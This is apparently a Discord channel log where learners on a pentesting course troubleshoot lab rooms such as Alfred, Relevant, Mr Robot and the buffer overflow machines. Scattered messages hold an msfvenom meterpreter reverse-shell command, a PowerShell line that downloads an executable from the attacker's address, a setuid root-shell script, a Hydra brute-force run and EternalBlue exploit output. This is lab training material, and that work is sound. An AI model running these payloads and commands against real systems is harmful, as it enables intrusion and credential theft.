#offensive-pentesting-path

Thanks

Rooted this yesterday.

relevant host crashes down for anyone?

happened for 3 times now

After an hour?

around that yes 😮

Yep, that's known

It's related to Windows licensing.
The creator's gone so it's not really fixable

@ashen hornet is it worth making a note on the room or something for cases like this?

Oh.

mate made this so hard. I'm getting mad over this now.

It's the same box every time though, nothing changes.
Keeping good notes should let you get back to where you were very quickly.

yea, I was talking about the box though.

On Retro I'm unable to ||exploit CVE-2019-1388 due to the options for choosing a browser not showing up on the "How do you want to open this website?" window. I started both chrome and IE before exploiting, to no avail. I tried adding each browser as the default app, and it still won't work||. Anyone has the same issue?

Here's a screenshot of the issue at hand

I think you have to do it from there, chose an app, on this pc and browse the program files directory to find the executables of the browsers

Did the room a couple of days ago. And this is part of the challenge. Tho the method you’ve used prior to executing the binary should work, it doesn’t for me either for some reason.

** maybe there’s another exploit that should work…

I am going to start the buffer overflow exploitation rooms but I haven't done much reverse engineering before or played with buffer overflows. any rooms that could help gain enough knowledge to be able to do em?

You're in for a doozy - hardest shit I've ever done in my life

Here's how I started: https://tryhackme.com/room/win64assembly -> https://tryhackme.com/room/windowsreversingintro -> https://tryhackme.com/room/bof1

And pick up Paul Carter's "PC Assembly Language" -> https://pacman128.github.io/static/pcasm-book.pdf

Thanks, I have done the first 2 rooms before, I'm doing the bof1.

Gave +1 Rep to @vital prawn

I'm having issues with overflow5 I have the correct bad characters but it says incorrect.

not sure

Tib3rius made the Windows and Linux priv esc rooms and a buffer overflow room.

q

Guys

Which one is more helpfull in Hacking- Bash or Python? Or is there any other programming language that is better for Hacking?

Both

anyone else unable to RDP into the AD machines (at least post-exploitation basics and attacking kerberos) with xfreerdp? I can get in fine with rdesktop as CONTROLLER\Administrator but I can't get in with, e.g., "xfreerdp /u:CONTROLLER\Administrator /p:P@$$W0rd /v:10.10.225.236" (even with /d domain flag)

try this:
xfreerdp /u:Administrator /p:'P@$$W0rd' /v:10.10.225.236

YESSS

@fathom marten thanks hero

Gave +1 Rep to @fathom marten

im so dumb

lmao

haha

👍

in Internal room created my the mayor i brute forced the password for the word press but when i try to log in to <ip>/blog/wp-login.php i get forwarded to internal-thm/blog/wp-login.php that i am unable to connect to
is this part of the room or is there something wrong with my connection

you have to add the hostname in your /etc/hosts

10.10.x.x internal.thm

is this mentioned anywhere in the room?

I think it is

Ensure that you modify your hosts file to reflect internal.thm

thank you

Gave +1 Rep to @fathom marten

I'm having issue with the last task in the Steel Mountain Room. I can get nc.exe to download via the python web server, but running the exploit again and again does not pop a shell. I've gone through multiple walkthroughs and none of them help.

@lean patio downloading nc.exe are you sure you read correctly ? I dont remember seeing this

yeah, you have to download nc.exe to the vulnerable box first then after you run the exploit again to pop a shell...i was wgetting the html file instead of the binary

Are you using the exploit? If so remember that it tries to get netcat from port 80,and Python http opens in port 8000 by default

Do you get a connection for your http server?

If not you will have to modify the script, as port 80 is already busy in the THM attackboxes

Hi. Im on the Post-Exploitation Basics-room of the OPT-path. In order to securecopy the zip file to my machine i need the password for my kali vm. Is there a deafult password for that?

Im on task 3

any help would very appreciated

Hello,

I met some problems in Intro to C2 room

I need to configure what IP address in Armitage ?

Hi Guys, is the Path "Offensive Pentesting" current or obsolete or replaced by "Jr. Pentesting"?

Both are different paths

They have the same topic

Pentesting

But different content, quite dramatically

It's not been announced that this path is being replaced or deprecated, so assume that it is not for now.

ok thanks

"Complete Beginner" is deprecated, right?

Yep, it was meant to be removed but they have not yet

Are you the only one who sees the status? Because I don't see anywhere that it says deprecated.

There was an email that went out

k

thanks

To nearly everyone, IDK why a lot of people didn't seem to get it

@ashen hornet This path really needs to obviously indicate that it's deprecated

Hi I am having issue in machine Kenobi when I mount the folder and try to cat or copy the id_rsa file the terminal gets stuck and I can't do any thing I have tried terminating the machine and everything but I can't get id_rsa file

Am I doing something wrong ?

I'm having a problem with finding the correct EIP offset for BOF 2 in Buffer Overflow Prep. There is always an additional 4 bytes to my result compared to the writeups and I can't figure out where I'm going wrong...

Hi I am stuck with impacket in the active directory lab, when i use the GetNPUsers.py i get the Domain should be specified! error, even when i try to add the .local at the end like GetNPUsers.py -request -no-pass -usersfile ~/userlist.txt -dc-ip 10.10.104.43 -format hashcat THM-AD.local.

why burp doesnt show intercept but proxy and intercept is on

???

I have the same issue 😮‍💨

Maybe you are browsing something that is out of scope.

Is your problem solved ?

heyy guys, is it normal that in "advanced exploitation" there's the 'Overpass 2 - hacked' room w/o having done the first one?

Yes

Is there any way to list payload options in msfvenom?

show payloads

I mean the options of specific payload such as windows/meterpreter/reverse_tcp how can i show it's options using msfvenom not msfconsole

The first result after trying to google should have revealed that 🙂
It's --list-options in case --payload-options is not working

I'm sorry
I already tried to search for an answer but I didn't find
This is where I searched for https://www.offensive-security.com/metasploit-unleashed/msfvenom/

Thank you

Hello, I am on the Alfred room and I can't understand how to exploit SeImpersonatePrivilege to do a privesc. I understand the SeDebugPrivileges one though

Can someone help please?

|| A potato || ?

I often Goog for "TheThingIWantToExploit Exploit Github" and get good results. I think you will too.

I've never managed to get the potato exploits to work but this one works for me on a few machines.

Hi there! For 3 days I've been trying to get Gatekeeper done and no success. :/ Before attacking the THM IP I was doing the exploit locally. Today, I checked some write ups and ended in the same way but still no luck with the reverse shell.

any light on this chaps? I'm totally blocked :/

THis is my current script.

The thing is, when running locally, Inmunity debugger gets paused.

if click play again to continue

then I press nope and then I get shell.

Any idea on this chaps? Thanks!

so my bet is something in my script. Obviously trying this in THM room never get shell as I can't press play 😛

Forget it, 2 JMP addresses and was trying the wrong one

guys I have a small doubt; help me with this scripts.

I wanted to make a simple root shell script and tried creating it in python and c .... but python script is not working ...

this is python one:-
#/usr/bin/python

import os

os.setuid(0)
os.setgid(0)
os.system("/bin/bash")

this is c:-
int main()
{
setuid(0);
setgid(0);
system("/bin/bash");
return 0;
}

so even if the script is run with root privileges; we can't execute the script ???

In the brainpan room, I don't really understand something.(I've done the room)
Knowing that the program runs on wine on linux. Its understandable how I would get a windows shell if I use a windows payload since Its kind of getting emulated. 😮 But how does using a linux shell payload works? like its still running as a windows program.

Hi i am currently in the internal room and i am using the attackbox and i tried logging in to the wordpress login page but when i press login it redirects to internal.thm which results in a site not found screen and not logging in. am i doing something wrong or is something else wrong

Going through the Kenobi room, and I've gotten the id_rsa key. I know we can SSH in because we saw the users directory was 'Kenobi', but I'm curious if there's a way to enumerate valid usernames if you have the private key? msf doesn't seem to have anything like that

You could brute force usernames with the key, metasploit can do that. I wouldn't say it's a good idea.

Hi guys I am stuck in overpass2 when I am trying ssh on port 2222 it's saying "unable to negotiate with <IP> port 2222: no matching host key type found Thier offer ssh-rsa " I have googled it but I am not getting anything

Google definitely has solutions for this, just adding a flag to ssh.

I know for certain google has the answer.

Ok

Solved thanks

Hey just saw you are the creater of that room.

It was really good learning and fun machine. I have a question can we expect this kind of machine or forensic in oscp exam or was it just for learning ?

Helloo, I've got a problem in the "brainstorm" room
The answer in the first task is "open ports: 6" and I thought I was using a wrong setup for nmap, but looking also on writeups etc.. everyone found only 3 open ports, why is that?

maybe they counted udp ports but it's honestly irrelevant to the actual room

Oh I think I got it, ||PrinterSpoofer||

(Y)

Do you mind expanding on that? I couldn’t find an SSH module that looked promising. Also, why isn’t it a good idea? Seems better than bruting valid SSH usernames

Because it's still brute force?
What do you mean by bruting valid ssh usernames?

I think it’s the newbie in me, but I’m assuming that enumerating SSH users is just finding what users exist on the machine, whereas I’m assuming that if I was enumerating for users and had a private key that I’d be able to identify which user the key belonged too

You can't do username enumeration

Those are recognised as serious vulnerabilities and are immediately fixed.

Understood, I saw that in one of the machines yesterday as every response was a false positive, removing that threat vector

You'll also notice it's for ancient versions of ssh

But that’s why I was asking in the first place. If enumerating users isn’t a viable path, but appending the private key would give us a valid login if the username was correct no?

What do you mean?

Hi

Anyone here?

My immunity debugger show C2 after 7f

In BOF Room

Unable to find badchars

somebody know why in Overpass2 we are working with Wireshark?? until now i dont see anything about it and this challenge requires to know wireshark... thinking if i forget some path ...

James could answer your question the best I think.

When The Mayor from TCM helped revamp the path, he put it in there.

You can learn wireshark

then it should recommend wireshark and cc pentesting and linux before do the room i think...

#feedback-and-ideas but cc pentesting is private.

And yeah, the linux content is already in the path before surely?

yeah linux is in the path before.... then would be nice recommend do wireshark before doing overpass2. thank you for your answers, nice support!!!

Gave +1 Rep to @keen iris

Remember that moderators are not tryhackme staff, and are especially not tryhackme support staff

what do you mean about that? im new in discord and dont understand some stuff.. sorry if i made som mistakes

Moderators are not tryhackme staff

ok

made the feedback on the site!

Hi guys, I am currently experiencing an issue with Offensive Pentesting -> Alfred (Jenkins) Room.

But before I go any further. I first need to verify if I'm using the current IP addresses. ( My IP vs Target IP )

So I create the app (.exe) that I'll make the Target download from my device.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[MY IP] LPORT=4242 -f exe -o [SHELL NAME].exe

In Jenkins under Build -> Windows Command. So when I run a build it downloads the file (.exe).

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<My IP>:4242/shell-name.exe','shell-name.exe')"

Then I use Metasploit

msfconsole

exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <My IP>
set LPORT 4242
run

Is this correct?

Because I keep getting this

Oky. I think I understand where I made the mistake.

Get the powershell reverse shell, and use that to download and run the meterpreter binary

Oh my god.
Oky thx. Got it.

Thanks @keen iris

Gave +1 Rep to @keen iris

[] Started reverse TCP handler on 172.25.53.79:4444
[] 10.10.124.252:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.124.252:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[] 10.10.124.252:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.124.252:445 - The target is vulnerable.
[] 10.10.124.252:445 - Connecting to target for exploitation.
[+] 10.10.124.252:445 - Connection established for exploitation.
[+] 10.10.124.252:445 - Target OS selected valid for OS indicated by SMB reply

[] 10.10.124.252:445 - CORE raw buffer dump (42 bytes)
[] 10.10.124.252:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[] 10.10.124.252:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[] 10.10.124.252:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.124.252:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[] 10.10.124.252:445 - Trying exploit with 12 Groom Allocations.
[] 10.10.124.252:445 - Sending all but last fragment of exploit packet
[*] 10.10.124.252:445 - Starting non-paged pool grooming

[+] 10.10.124.252:445 - Sending SMBv2 buffers
[+] 10.10.124.252:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[] 10.10.124.252:445 - Sending final SMBv2 buffers.
[] 10.10.124.252:445 - Sending last fragment of exploit packet!
[] 10.10.124.252:445 - Receiving response from exploit packet
[+] 10.10.124.252:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[] 10.10.124.252:445 - Sending egg to corrupted connection.
[] 10.10.124.252:445 - Triggering free of corrupted buffer.
[-] 10.10.124.252:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.124.252:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.124.252:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[] 10.10.124.252:445 - Connecting to target for exploitation.
[+] 10.10.124.252:445 - Connection established for exploitation.
[+] 10.10.124.252:445 - Target OS selected valid for OS indicated by SMB reply
[] 10.10.124.252:445 - CORE raw buffer dump (42 bytes)
[] 10.10.124.252:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[] 10.10.124.252:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[] 10.10.124.252:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.124.252:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[] 10.10.124.252:445 - Trying exploit with 17 Groom Allocations.
[] 10.10.124.252:445 - Sending all but last fragment of exploit packet
[*] 10.10.124.252:445 - Starting non-paged pool grooming

hi people, im in mr robots room, somebody knows whats wrong here? find a user that is wrong

hydra -L fsocity3.dic -p test 10.10.36.35 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.36.35%2Fwp-admin%2F&testcookie=1:Invalid username." -F
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-06-19 01:17:58
[DATA] max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:11452/p:1), ~716 tries per task
[DATA] attacking http-post-form://10.10.36.35:80/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.36.35%2Fwp-admin%2F&testcookie=1:Invalid username.
[STATUS] 761.00 tries/min, 761 tries in 00:01h, 10691 to do in 00:15h, 16 active

[STATUS] 316.33 tries/min, 949 tries in 00:03h, 10512 to do in 00:34h, 7 active
[80][http-post-form] host: 10.10.36.35 login: 20that password: test
[STATUS] attack finished for 10.10.36.35 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-06-19 01:22:21

should be elliot and find 20that

You aware that you specified the fsocity.dic as the username wordlist and the password to try as test?
Rather then using fsocity.dic as the password list and specifying the username you want to bruteforce that list for ?

well i want to bruteforce the username... to then when a get it bruteforce the pass

Okay? But how do you want to do that with a wordlist that most likely only contains possible passwords?

uhum... should i try rockyou.txt better?

Well rockyou is also a wordlist containing possible passwords, so I doubt it has the correct username in it.
But you could either use a username wordlist and check if the correct username is in it, or just make a custom wordlist and add the correct username to that list, if your goal is to simply try if you can bruteforce the username with hydra

got it! ive already made this checking the hash from the path /license but i wanna know how to do it with hydra. Thank a lot person!!!🥳

Gave +1 Rep to @dense gate

nc my machine ip 1337 | Buffer overflow prep it doesnt work

Your LHOST value is incorrect

im trying to connect to rdp via xfreerdp and im getting below error
"""

[06:47:19:801] [51752:51753] [ERROR][com.freerdp.core] - transport_ssl_cb:freerdp_set_last_error_ex ERRCONNECT_PASSWORD_CERTAINLY_EXPIRED [0x0002000F] [06:47:19:801] [51752:51753] [ERROR][com.freerdp.core.transport] - BIO_read returned an error: error:14094438:SSL routines:ssl3_read_bytes:tlsv1 alert internal error

Try a different client

same issue with xfreerdp, remmina, rdesktop

any other clients i didnt try ?

The official Microsoft Windows rdp client

oh

I finished alfred and the hardest part of this room was just finding a user/password file combination to use with hydra to get into jenkins...Like this took me hours...trying to use rockyou.txt until i just stopped and used unix passwords.txt

Is there a better way to go about finding the proper users/passes for these rooms?

hydra/hashcat also tend to give me a hard time, a lot of times. i think it's normal.

Hydra failed me on Mr.Robot. For days on end, repetitive "Add 1 Hour"s", constant restarting, running out of time, restarts, running out...

i don't know if it's an issue with "weak hardware" or not.

i know for crypto, it can be, but with brute-forcers I'm not sure

i would think not, seeing it's not "cracking" anything. it's just running through words in a list and making http requests...

but what do I know...

eventually i just cracked and said "f#ck you, hydra"... went and simply looked up the password.

more like "f#ck you, laptop", but still .. took my anger out on Hydra for it

Wait, what?you are brute forcing creds on Mr robot room? If yes, then the credentials are stored on web server you have to enum harder and see everything that your dir bruteforces gives you (:

that's odd...
I've seen 6 write-ups that also use brute forcing.

i found fsocity.dic. That was the wordlist used. There wasn't much else.

I dont think you have to bruteforce. Not sure but i found creds on the website

On different page

everyone I've read (and watched) simply runs hydra with the dictionary file and they've got it to work.

I'm wondering where this "page" is you're talking about. I was pretty thorough and recursive with the dirbuster scan...

maybe it's burried deeper than I thought? I'll have to test that out again, eventually.

hmm...

I need a sanity-check, now. You just turned my world upside down with that info....

can anyone else confirm/deny??

I'm not going to be able to sleep over this haha

i let dirbuster run for quite a bit of time.... maybe "not long enough".

Check ||license.txt|| whole source code

Hi, attempting the Brainstorm room

my ftp says entering extended passive mode and i cant list anything

but writeups say otherwise

anyone know whats the issue ?

Run binary in the ftp terminal to go into that mode, you can also do passive,
If all else fails just download from the attackbox and transfer to your own machine(its what I did)

Hi. I am trying to use my local host windows OS as a target, and my VMware kali linux as an attacker. I used the same for Brainstorm and it worked well, but on Gatekeeper I recv ```
┌──(root㉿kali)-[/home/kali/Documents/THM/GateKeeper]
└─# python3 fuzzer.py
Fuzzing with 100 bytes
Could not connect to 192.168.8.1:31337

check the vm network settings

i remember having a similiar issue but i cant remember what was the solution

What should I look for in VM settings?

do u have ethernet or wireless?

Wireless

@mystic summit My options are: ```

1. Bridged: Connect directly to the physical network.
2. NAT: Used to share with the host network.

try with nat

ping 192.168.8.1

Ping result: ```
--- 192.168.8.1 ping statistics ---
10 packets transmitted, 10 received, 0% packet loss, time 9064ms
rtt min/avg/max/mdev = 0.599/0.768/0.939/0.098 ms

try now with the fuzzer idk

Same result ```
┌──(root㉿kali)-[/home/kali/Documents/THM/GateKeeper]
└─# python3 fuzzer.py
Fuzzing with 100 bytes
Could not connect to 192.168.8.1:31337

damn

idk

before nat u used bridged?

right?

No. I have always used NAT. it's the default settings.

wait

is the port 31337 open on the windows machine

?

should be. nmap says it is. But let me check with my cmd.

maybe the python script?

If it was the script the error would show. But it only says Could not connect to 192.168.8.1:31337

See! The nmap works fine ```
┌──(root㉿kali)-[/home/kali/Documents/THM/GateKeeper]
└─# nmap -sS -sV 192.168.8.1 -p 31337
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-21 19:02 EDT
Nmap scan report for 192.168.8.1
Host is up (0.00039s latency).

PORT STATE SERVICE VERSION
31337/tcp open Elite?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.92%I=7%D=6/21%Time=62B24E2A%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,24,"Hello\x20GET\x20/\x20HTTP/1.0\r!!!\nHello\x20\r!!!\n")%r
SF:(SIPOptions,142,"Hello\x20OPTIONS\x20sip:nm\x20SIP/2.0\r!!!\nHello\x20
SF:Via:\x20SIP/2.0/TCP\x20nm;branch=foo\r!!!\nHello\x20From:\x20<sip:nm@n
SF:m>;tag=root\r!!!\nHello\x20To:\x20sip:nm2@nm2\r!!!\nHello\x20Call-ID:
SF:\x2050000\r!!!\nHello\x20CSeq:\x2042\x20OPTIONS\r!!!\nHello\x20Max-Forw
SF:ards:\x2070\r!!!\nHello\x20Content-Length:\x200\r!!!\nHello\x20Contact:
SF:\x20sip:nm@nm\r!!!\nHello\x20Accept:\x20application/sdp\r!!!\nHello\x
SF:20\r!!!\n")%r(GenericLines,16,"Hello\x20\r!!!\nHello\x20\r!!!\n")%r(HTT
SF:POptions,28,"Hello\x20OPTIONS\x20/\x20HTTP/1.0\r!!!\nHello\x20\r!!!\n"
SF:)%r(RTSPRequest,28,"Hello\x20OPTIONS\x20/\x20RTSP/1.0\r!!!\nHello\x20
SF:r!!!\n")%r(Help,F,"Hello\x20HELP\r!!!\n")%r(SSLSessionReq,C,"Hello\x20
SF:x16\x03!!!\n")%r(TerminalServerCookie,B,"Hello\x20\x03!!!\n")%r(TLSSess
SF:ionReq,C,"Hello\x20\x16\x03!!!\n")%r(Kerberos,A,"Hello\x20!!!\n")%r(Fou
SF:rOhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity.txt%2eba
SF:k\x20HTTP/1.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x20\x01de
SF:fault!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x01!!!\n"
SF:);
MAC Address: 00:50:56:C0:00:08 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 158.02 seconds
```

the port then

wait no nvm

@mystic summit What do you mean by 'no nvm'?

"no nevermind"

@hidden shoal for string in buffer: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(timeout) connect = s.connect((ip, port)) print("Fuzzing with %s bytes" % len(string)) s.send(string + "\r\n") data = s.recv(1024) s.close() except: print("Could not connect to " + ip + ":" + str(port)) sys.exit(0) time.sleep(1)

if there are any type of errors it prints "could not connect to..." right?

That's right! The other way would be too detailed and complicated.

Is there an online windows OS I can try my codes on?

Or would it make any difference if I use the Attack Box?

That's what I'm doing now!

This is still an issue that hasnt been updated

Hmmmmm isn't the password the default one? I don't recall using hydra for the Alfred room

the only combination i could find for jenkins default password was admin/password and that didnt work

I think it is good practice to try admin:admin and admin:password root:root and admin:root

yeah for sure, still pretty new

Sure np, I am a newb too but I got lucky

Hi guys, im on machine RELEVANT and when i try to get in without pass to the smb it dont work, any help?

❯ smbclient \\10.10.120.93\nt4wrksv
Password for [WORKGROUP\root]:
do_connect: Connection to 10.10.120.93 failed (Error NT_STATUS_IO_TIMEOUT)

ive tried the two pass that found in passwords.txt just in case but doesnt work... @hidden shoal or @keen iris can you help me?

Hi. I have a question. A guy entered our Discord server and somehow hacked it by giving himself roles and deleting people

Is there any way I can get his IP without the need of a link or image?

@silk needle why do you want their IP?

To maybe get him to leave the server

Not gonna do anything further than that

Why would that work?

By threatening him

That's not ethical

Just ban them

We can't

He took the owner role

Then they can't leave. We're not going to help you do something unethical

And he's kicking and banning people out of the server

Contact discord support

K ty anyways ig

Gave +1 Rep to @keen iris

-ban @silk needle Asking for IP grabbers to scare someone on discord, unethical

🔨 Banned LoneSwordsman#9420 indefinitely

You're welcome

I found the same thing. Only 3 tcp ports open. Didn't scan udp.

Heyy, I'm having problems with dropping the .zip file in bloodhound (for the "Post_exploitation Basics" room in Active Directory section)
It says that "BAD JSON FILE" for both the .zip file and the .json files in the folder (I also tried to drop them directly but it says "file created from incompatible collector" ---> maybe window's bloodhound's version is different and it collects data in other incompatible format than the ones that newer versions use?)

Yeah you need to use an older version of bloodhound for it to work

I have a question. https://tryhackme.com/room/basicmalwarere , what software should I use to get the MD5 hash from the files downloaded in this task?

on linux there is tools for that named like md5sum

Thank you Shadow_absorber

Gave +1 Rep to @vernal mason

nice... and yeah there are a decent bit of hash calculating binaries for linux to help with this

Shadow_asorber, what I wanted was the MD5 hash, I used Hex editor, I will also look at md5sum.

Hello! I am new in here so if this isn't the right channel, please let me know. I am working on Buffer Overflow Prep room for the OSCP, and I had a question regarding the exercises, specifically, the question " What is the EIP offset for OVERFLOW3?". This isn't specific to OVERFLOW3, but I've noticed that the EIP offset within Immunity Debugger seems to be the value found at "ESP (xxxx) points at offset XXXx in normal pattern (length 111)" line since submitting the EIP offset tells me it is incorrect, and only accepts the ESP offset. Anyone that might be able to explain this? Shouldn't it be the actual offset for the EIP, like the line that says "EIP contains normal pattern : xxxx (offset 1234)"? When looking at different blogs, they all seem to be referring to the actual EIP line rather than the ESP line (e.g., https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst).

Hello i am new here as well just started the offensive-pen testing path,

sorry hit send accidently

Hello i am new here as well just started the offensive-pen testing path , i am on task 1) step 2. and it asks you "too type the following command into the terminal" then it shows a screen with code. do i type this whole screen with every === looks like a lot and am having hell of a time counting them. i tried writing it all down but its not working my spaces are off but that wouldn't make the code not run would it?

Task 1 step 2 of which room?

@turbid cradle intro too offensive security jr pen tester

No, just the first line is the command gobuster -u http://fakebank.com -w wordlist.txt dir

thanks soo much @dense gate alot easier then what ive been trying too do dont know how i misswed that.

Gave +1 Rep to @dense gate

Any good tutorial with all options of nuclei, pls dont point me to MD path

issue on alfred room

ive done this and its already downloaded the file

but its not executing it?

Check the output in Jenkins

its just showing the whoami

also i tried changing the port and re applying and saving it but it wont let me

thsis is what happens when i try to save

applying doesnt work either

it seems to let me apply and save it now but

not getting a hit on my http serve

same issue again if i try applying again

dude

im so stupid lmao that was when i checked if the file was available

Did you fix it?

Is it working?

no

im still waiting for my file to be downloaded

Ok, in the pins in #site-support there is an MTU fix. Try that.

MTU?

i see it

it fixed the issue of "connection was reset" but im still not getting any hits on my http server

this looks right to me tho

Look at the build job output

this?

wwhere is the build job output

That's going to be for an old version?

ohh

I wasnt aware you had to create a new build

🤕

hi people, doing RELEVANT and i cant not enter smb without password when on the video shows it doesnt need.. any suggestion??

❯ smbclient //10.10.182.73/nt4wrksv
Password for [WORKGROUP\root]:
do_connect: Connection to 10.10.182.73 failed (Error NT_STATUS_IO_TIMEOUT)

❯ smbclient \\10.10.182.73\nt4wrksv
Password for [WORKGROUP\root]:
do_connect: Connection to 10.10.182.73 failed (Error NT_STATUS_IO_TIMEOUT)

Hey guys, I was doing Game Zone and I am not able to understand how the Reverse SSH Tunneling concept is applied in Task 5 and also It says service running on Port 10000 is blocked via firewall but how do we know it's blocked actually.

Can someone help me with this?

well, can you access the service from outside/your_attacking_machine directly?

Sorry about the wordings of my question 😅.. actually in the task it says " we can see that service running on Port 10000 is blocked via a firewall rule from outside ( we can see this from the IPtable list)". Is there any way that we can see in the target machine which all ports/ services are blocked.

!docs verify

some ports can show up filtered/closed(read through the nmap guide for more info) but we can't see 'em most of the time

ok..thanks

Getting ampersand not allowed in Alfred room while running Invoke-Expression.ps1

http.server is working fine but not getting any response in nc listener

Can anyone help me out, please?

Hi @hidden shoal ! the buffer overflow prep teach us what is buffer overflow or just how to hack it? there any room where to learn buffer overflow from the beginning?

also im getting an error trying to connect xfreerdp

❯ xfreerdp /u:admin /p:password /cert:ignore /v:10.10.148.29 /workarea
[14:17:38:505] [39923:39924] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[14:17:38:505] [39923:39924] [ERROR][com.freerdp.core] - failed to connect to 10.10.148.29

Learn computer organisation and it gets easier

hahahahaha sorry!!!!

that is a walkthrough?

oh don't you need buffer overflow for oscp?

🧠

well, seems to be there is a Buffer Overflows for basics understanding that leave me to intro to x86-64 room (but this last one is private sh**)

None of those are what I recommended

then shouldnt i start from thm?

Personally I wouldn't, because computer organisation is a computer science topic

Hacking builds on computer science and IT

ok got it... will search information about computer organization. thanks!

Gave +1 Rep to @keen iris

jr pentester > offensive pentester
or
Basic > jr > offensive

Lol, that moment when you're not sure if it's an arrow or a greater than. Jr then Offensive isn't bad. Basic is deprecated, so most don't see a reason to do it. Jr Pentester to PenTest+ to Offensive Pentester is also an option.

thnx
ser it was a greater than ... just kidding 😅

I ran gobuster dir -u http://fakebank.com -w /home/roki/wordlists/directory-list-2.3-medium.txt and don't seem to find the 'bank-transfer' page as instructed on TASK 1 - Intro to Offensive Pentesting Room

These are my results all the time with different wordlists tried:

have you used the correct wordlist (that's mentioned in the room possibly)?

👀

oh lmao, it's literally a fake bank website

wth???

that was clearly unintentional !!

i did not mean to !!!

I'm a bit confused ? 🤔

is just for show

It states there so I copied what I saw ! i sincerely apologize for this

wow

So i was clearly scanning that domain illegally

they have my IP now

Okay, thank you lassi !! definitely eased my mind

Gave +1 Rep to @hidden shoal

Okay, so I still get the same results with the IP address

also, i have already tried different wordlists and even the wordlists they have provided

going to restart my machine

Got it! This is why i was confused

I mis read as i tend to skim through this a lot

I'm supposed to use their machine

Hey guys I need some help here. I'm currently doing OSCP BOF Prep room. My RDP session gets disconnected often like once in 5 minutes .

My network connection is stable and I'm connected to VPN too.

what am i doing wrong?

That's not how you connect to smb share with username.

I'd recommend reading this first:
https://www.samba.org/samba/docs/current/man-html/smbclient.1.html

alternatively, put smbclient --help in your terminal and enter.

Ohh

I'm doing the Brainstorm room. When I try to attach the exe file to the immunity debugger and run, I was not able to run it. It is still in the paused mode. And when I tried to run the file alone, nothing is showing up.

do you try on local win machine ?

overpass2 i cant connect for some reason

Google the error message.

Yes I did on a VM. I'm using Mac M1 and used Win 11 for running the application. Tried the compatibility mode for Win 7 but it did not work.

Hey all, I've come across an issue during my engagement on Relevant. Two of the SMB shares (IPC$ and nt4wrksv) are open so that doesn't require credentials to access.

According to many walkthroughs (I hated checking them out cuz I wanted to do it all by myself) Machine is supposed to be vulnerable to MS17-010 (Eternal Blue), which I confirmed from the Nmap vuln scanning but doesn't seem to be working when tested out with various exploits found online such as AutoBlue, zzz_exploit.py, etc. They all kinda led to ACCESS DENIED. I tried to open up the exploit and see what's going on but no luck..

Can someone tell me what's going on? Let me know if you need some more info

cant connect for some reason

have you added the ip in /etc/hosts?

no i didnt know i had to do that

internal.thm isn't a real domain name 🙂

yea im stupid

i cant update the file brah

Something went wrong. Your change may not have been saved. Please try again. There is also a chance that you may need to manually fix and upload the file over FTP.

keep getting this error when i try to upload a rev shell

Try to Upload file in different theme

Hello All,
I'm currently doing Alfred and for some reason my meterpreter shell is being dropped immediately. Anybody run into the same problem? I have seen some alternative methods, but would like to get the intended path working for good practice

on the Jenkins build config i have tried the following bash;
powershell -c Start-Process "shell.exe" (also with 'powershell.exe' and with/without '-c')

otherwise all other lines of code they provided were fine, including the windows/meterpreter/reverse_tcp payload and the shikata encoding methods.

should i just bite the bullet and use web delivery?

You are catching it with multi/handler , right ?

yes

And you set the payload of multi/handler to the exact same payload as for your rev shell ?

yes, i just double checked

may i ask what the exitfunction is? perhaps this? i saw someone online include this as 'thread' in their msfvenom. but its not listed on the steps

mine is currently set to process

